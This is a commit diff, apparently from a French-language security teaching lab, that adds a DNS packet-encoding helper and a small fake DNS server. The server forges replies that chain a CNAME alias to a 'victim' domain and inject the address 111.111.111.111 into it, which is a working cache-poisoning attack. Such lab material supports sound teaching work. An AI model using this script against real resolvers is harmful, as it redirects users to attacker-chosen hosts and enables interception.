Partie I
continuous-integration/drone/push Build is passing
Details
continuous-integration/drone/push Build is passing
Details
parent
1cd26cf6d5
commit
15810bbd44
@ -0,0 +1,85 @@
|
||||
TYPE_A = b"\x00\x01"
|
||||
TYPE_NS = b"\x00\x02"
|
||||
TYPE_CNAME = b"\x00\x05"
|
||||
CLASS_IN = b"\x00\x01"
|
||||
|
||||
def encode_question_entry(encoded_name: bytes, type: bytes, clazz: bytes) -> bytes:
|
||||
"""Encode entry question section"""
|
||||
return encoded_name + type + clazz
|
||||
|
||||
def encode_response_entry(encoded_name: bytes, type: bytes, clazz: bytes, ttl: int, rdata: bytes):
|
||||
"""Encode entry response section"""
|
||||
return (encoded_name
|
||||
+ type
|
||||
+ clazz
|
||||
+ ttl.to_bytes(length=4, byteorder="big")
|
||||
+ len(rdata).to_bytes(length=2, byteorder="big")
|
||||
+ rdata)
|
||||
|
||||
def encode_name_pointer(offset_since_start: int):
|
||||
"""Encode name pointer"""
|
||||
# Note: this wrongly assumes that offset <= 255
|
||||
return bytes((0xC0, offset_since_start))
|
||||
|
||||
def encode_name(name: bytes) -> bytes:
|
||||
"""a domain name represented as a sequence of labels, where
|
||||
each label consists of a length octet followed by that
|
||||
number of octets."""
|
||||
# https://datatracker.ietf.org/doc/html/rfc1035#section-4.1.2
|
||||
encoded = b""
|
||||
|
||||
for component in name.split(b'.'):
|
||||
# Chaque composant est précédé par sa longueur en octet encodé sur 1 octet
|
||||
encoded += len(component).to_bytes(length=1, signed=False)
|
||||
# Contenu
|
||||
encoded += component
|
||||
|
||||
# Fin du nom
|
||||
encoded += b'\x00'
|
||||
|
||||
return encoded
|
||||
|
||||
def encode_header(response: bool, opcode: int, authoritative: bool, truncated: bool, rec_d: bool, rec_a: bool, rcode: int, questions: int, answers: int, authorities: int, additional: int):
|
||||
flags = [0, 0]
|
||||
if response:
|
||||
flags[0] |= 0x80
|
||||
flags[0] |= (opcode & 0x0F) << 3
|
||||
if authoritative:
|
||||
flags[0] |= 0x04
|
||||
if truncated:
|
||||
flags[0] |= 0x02
|
||||
if rec_d:
|
||||
flags[0] |= 0x01
|
||||
|
||||
if rec_a:
|
||||
flags[1] |= 0x80
|
||||
flags[1] |= rcode & 0x0F
|
||||
|
||||
# header = tid.to_bytes(length=2, byteorder="big")
|
||||
header = bytes(flags)
|
||||
header += questions.to_bytes(length=2, byteorder="big")
|
||||
header += answers.to_bytes(length=2, byteorder="big")
|
||||
header += authorities.to_bytes(length=2, byteorder="big")
|
||||
header += additional.to_bytes(length=2, byteorder="big")
|
||||
|
||||
return header
|
||||
|
||||
class DNSServer:
|
||||
"""Represent a DNS Server"""
|
||||
|
||||
def __init__(self, ip: str, port: int, query_port: int):
|
||||
self._ip: str = ip
|
||||
self._port: int = port
|
||||
self._query_port: int = query_port
|
||||
|
||||
@property
|
||||
def ip(self) -> str:
|
||||
return self._ip
|
||||
|
||||
@property
|
||||
def port(self) -> int:
|
||||
return self._port
|
||||
|
||||
@property
|
||||
def query_port(self) -> int:
|
||||
return self._query_port
|
||||
@ -0,0 +1,41 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import socket
|
||||
|
||||
# Des fonctions utilitaires pour encoder les paquets DNS.
|
||||
# Vous pouvez y jetter un oeil si vous voulez mais ce n'est pas le plus important.
|
||||
from dns_utils import *
|
||||
|
||||
# DNS utilise UDP en temps normal
|
||||
sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
# Notre faux DNS est joignable localement sur le port 25566
|
||||
sok.bind(("127.0.0.1", 25566))
|
||||
|
||||
# Attendre l'arrivée d'un paquet (requete) DNS
|
||||
request, client = sok.recvfrom(512)
|
||||
print("Traitement de la requete pour", client)
|
||||
|
||||
# Le nom de domaine utilisé comme alias pour s'affranchir des problèmes de cache
|
||||
# TODO
|
||||
alias_name = encode_name(b"existepas.nomde.domaine")
|
||||
# Le véritable nom de domaine visé par l'attaque
|
||||
spoofed_name = encode_name(b"nomde.domaine")
|
||||
# L'adresse IP injectée dans le nom de domaine victime (spoofed_name)
|
||||
injected_address = bytes((111, 111, 111, 111))
|
||||
|
||||
# Pour la simplicité, on ne tient compte que de l'identifiant de la requete qui est nécéssaire pour la réponse
|
||||
identifier = request[:2]
|
||||
|
||||
# On fabrique la réponse en utilisant le même identifiant
|
||||
response: bytes = identifier
|
||||
# Puis on met les entêtes classiques
|
||||
response += encode_header(response=True, opcode=0, authoritative=False, truncated=False, rec_d=True, rec_a=True, rcode=0, questions=1, answers=2, authorities=0, additional=0)
|
||||
# On remet la question (ici elle est assumée être la même)
|
||||
response += encode_question_entry(encoded_name=alias_name, type=TYPE_A, clazz=CLASS_IN)
|
||||
# La réponse pour le nom de domaine demandé qui est un alias pour le nom victime
|
||||
response += encode_response_entry(encoded_name=alias_name, type=TYPE_CNAME, clazz=CLASS_IN, ttl=3600, rdata=spoofed_name)
|
||||
# La 2e réponse pour le nom de domaine victime, avec notre adresse IP injectée
|
||||
response += encode_response_entry(encoded_name=spoofed_name, type=TYPE_A, clazz=CLASS_IN, ttl=3600, rdata=injected_address)
|
||||
|
||||
# Envoyer la réponse au client
|
||||
sok.sendto(response, client)
|
||||
Reference in new issue